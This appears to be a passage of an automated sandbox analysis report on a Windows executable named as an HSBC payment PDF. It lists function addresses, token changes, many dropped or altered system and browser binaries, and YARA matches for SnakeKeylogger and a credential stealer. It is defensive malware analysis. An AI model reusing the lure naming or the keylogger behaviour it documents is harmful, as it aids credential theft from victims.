              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D6E2785_2_05D6E278
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D682005_2_05D68200
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_009C2ED011_2_009C2ED0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_022B2ED012_2_022B2ED0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 14_2_00BC2ED014_2_00BC2ED0
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_0098814016_2_00988140
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009BF08016_2_009BF080
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009862E016_2_009862E0
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_00990A1016_2_00990A10
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009BCB1016_2_009BCB10
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_0098A35016_2_0098A350
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_00990B7016_2_00990B70
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009BBD8016_2_009BBD80
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009B2D1016_2_009B2D10
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_00987E7016_2_00987E70
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009B4F1016_2_009B4F10
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009C2F3316_2_009C2F33
              Source: C:\Windows\System32\Spectrum.exeCode function: 20_2_00752ED020_2_00752ED0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 22_2_00D42ED022_2_00D42ED0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: String function: 00407DE1 appears 35 times
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: String function: 00428900 appears 42 times
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: String function: 00420AE3 appears 70 times
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.3
              Source: elevation_service.exe.4.drStatic PE information: Number of sections : 12 > 10
              Source: ie_to_edge_stub.exe.4.drStatic PE information: Number of sections : 11 > 10
              Source: elevation_service.exe0.4.drStatic PE information: Number of sections : 12 > 10
              Source: firefox.exe.4.drStatic PE information: Number of sections : 11 > 10
              Source: setup.exe.4.drStatic PE information: Number of sections : 13 > 10
              Source: msedgewebview2.exe.4.drStatic PE information: Number of sections : 14 > 10
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: Number of sections : 13 > 10
              Source: chrome_proxy.exe.4.drStatic PE information: Number of sections : 12 > 10
              Source: msedge_proxy.exe.4.drStatic PE information: Number of sections : 12 > 10
              Source: identity_helper.exe.4.drStatic PE information: Number of sections : 12 > 10
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1324471492.000000000438D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1319525137.00000000041E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1317022213.0000000003DD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1313006150.0000000003DD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: chrome_proxy.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: crashreporter.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler64.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdate.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateBroker.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: default-browser-agent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateComRegisterShell64.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: firefox.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateCore.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateOnDemand.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: minidump-analyzer.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pingsender.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: plugin-container.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: private_browsing.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: updater.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jabswitch.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java-rmi.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javacpl.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
